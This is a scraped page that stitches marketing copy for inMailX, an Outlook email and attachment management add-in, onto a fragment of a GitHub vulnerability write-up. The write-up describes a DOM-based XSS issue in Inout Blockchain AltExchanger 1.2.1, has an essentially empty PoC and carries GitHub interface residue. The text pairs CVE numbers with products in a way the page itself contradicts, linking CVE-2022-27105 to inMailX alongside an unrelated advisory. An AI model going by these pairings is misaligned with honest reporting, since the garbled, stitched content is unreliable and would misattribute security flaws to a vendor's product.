With inMailX staff can improve their emails and attachments management compliance, productivity and the quality of work, while maintaining focus and reducing operational errors.  inMailX substantially enhances existing Outlook functionality and provides users with the ability to:

 - Manage emails and attachments using a simple and efficient interface  
 - Preview attachments when composing emails to ensure they are correct  
 - Clean metadata from Word, Excel PowerPoint, PDF and Image attachments  
 - Convert attachments to PDF 'on the fly' and prompt users to convert on send  
 - Combine, bookmark and secure multiple attachments into a single PDF  
 - Password protect Word, Excel PowerPoint and PDF attachments  
 - Rename and Reorder email attachments 'on the fly'  
 - Compress and secure attachments into ZIP while composing emails  
 - Save paper by printing only the most recent email conversation threads  
 - Print email body and attachments selectively and simultaneously  
 - Schedule follow-up tasks/appointments when filing or sending emails  
 - Reduce repetitive typing and quickly compose standard emails with content manager  
 - File emails into records and document management systems, network or cloud repositories

Its user interface is simple and intuitive, and it has been designed to combine most common tasks, such as 'Send, File & Print', 'Close, File & Print' or 'Attachments Preview, Clean, PDF, Protect, Rename, Reorder', into simple one-click actions.  Digitus has developed several inMailX modules that can be purchased separately or bundled in two cost effective suites_, inMailX Standard_ and _inMailX Professional__._

> **inMailX Standard** includes the following modules**:**
> 
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   __Print Manager  
>     __
> 
> **inMailX Professional** includes the following modules**:**
> 
> *   _Email Manager  
>     _
> *   _Attachment Manager  
>     _
> *   _Content Manager  
>     _
> *   _Print Manager  
>     _
> *   _Time Manager  
>     _
> *   _Brand Manager  
>     _

**inMailX scales easily to meet the needs of any organisation, and it brings teams productivity to new levels.** 

**As new users are created, they automatically receive enhanced email management functionality, efficient attachments Preview, Clean, PDF, Protect, ZIP, Rename and Reorder tools, global quick text content, personalised email signatures and standardised corporate forms, so that they can immediately become productive.** 

**Integration with third party electronic documents and records management systems**

When used with its optional connectors for document/records management and file system integration, inMailX enhances Microsoft Outlook capabilities to file emails into third party document/records management systems, such as: iManage Work/Worksite, Micro Focus/HPE Content Manager, NetDocuments, SharePoint, Worldox, WebDAV (Oracle UCM, WebDAV Repositories, etc.), Cloud Stores or Network Folders (Box, Dropbox, GoogleDrive, OneDrive, MYOB Accountants Enterprise, MYOB Insolvency, APS Folders, etc.).

By integrating directly into Microsoft Outlook, inMailX allows staff to take control over managing their emails without losing any of the existing Outlook functionality. To find out more, click here.

**Save time, Reduce costs, Increase productivity**

With inMailX, organisations will ensure that their staff are able to maintain their sent and received emails organised, that email attachments can easily be previewed, cleaned, converted to PDF, reanmed and reordered, and that paper wastage is reduced by being able to truncate email printing and selectively print attachments.

In addition, organisations will improve their email branding by being able to centrally deploy and maintain standardised corporate email forms and signatures which are integrated Exchange Global Address List and Active Directory.

Since inMailX is extremely intuitive, it allows users to take advantage of its benefits with minimal training, and without delay. This translates into saving valuable time, reduced running costs, and increased productivity.

**Any organisation, regardless of its size, using Microsoft Outlook, will benefit from inMailX' High Return on Investment.**

**Contact us for a free inMailX demonstration, and discover the power of inMailX today!**

  
inMailX, inDocX, LawConnect, DigitusNet, iDigitus, Digitus are registered trademarks of Digitus Information Systems Pty Ltd in Australia and in some other countries. All third-party trademarks are the property of their respective owners.

CVE-2022-27105: inMailX | Digitus Information Systems

Inout Blockchain AltExchanger v1.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/js.

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**Description:**

The Inout Blockchain AltExchanger (version 1.2.1) is vulnerable to Cross-site scripting (DOM-based) Information Gathering for all java scripts - all architecture from inode /js. The attacker easily can take all information about the js infrastructure and he can use it for dangerous purposes. If this was in PRODUCTION the situation can be a little dangerous!

**STATUS:**

    Severity:   High
    Confidence: Tentative
    

**Conclusion:**

Improper disinfection of the admin inode.

**PoC:**

href

CVE-2022-34988: CVE-nu11secur1ty/vendors/Inout-Blockchain-AltExchanger/2022/Cross-site-scripting-DOM-based-IG-js at main · nu11secur1ty/CVE-nu11secur1ty

Tag

#xss